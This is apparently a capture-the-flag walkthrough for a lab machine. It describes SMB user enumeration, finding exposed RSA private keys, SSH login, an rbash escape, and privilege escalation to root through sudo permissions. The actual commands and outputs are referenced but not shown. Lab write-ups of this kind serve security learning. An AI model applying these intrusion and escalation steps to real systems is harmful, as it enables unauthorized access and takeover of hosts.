Starting off on this machine we find that port 80 is restricted by a HTTP-basic-auth login.
I decided against bruteforcing for the moment and move straight on to other ports on the machine. Looking at port 445 for SMB I run enum4linux against the target and discovered some user accounts.
We have discovered the following users:
Otherwise with no open shares on SMB we move onto enumerating port 7601 of which in the browser takes us to the following below:
dirsearch.py against this port reveals the /keys/ directory.
Private and private.bak contain RSA keys. I moved the key over to my desktop, renamed to id_rsa and used
chmod to set appropriate permissions.
Knowing of the three users on the target machine we can guess and login to
SSH. I was able to login with the user tanto.
Once logged in as tanto we see we are restricted in
rbash and unable to run some commands. I used the following command sequence to first escape
rbash then export a new path then finally updated to a Python shell again.
Once we can move around the box again I moved into the seppuku users directory. The file .passwd is of interest and contains the password:
This password did not work for the user seppku but I was able to use
su and the password to login as the user samurai.
I then transferred linpeas over to the attacking machine which soon picked up sudo permissions.
Open another tab and log in as tanto on
SSH again. The create the directory and file so we can execute as the user samurai. Once the directory and bin file has been created echo in a bash shell then
chmod to make it executable.
Then on our other tab execute the file with the following command to gain root shell: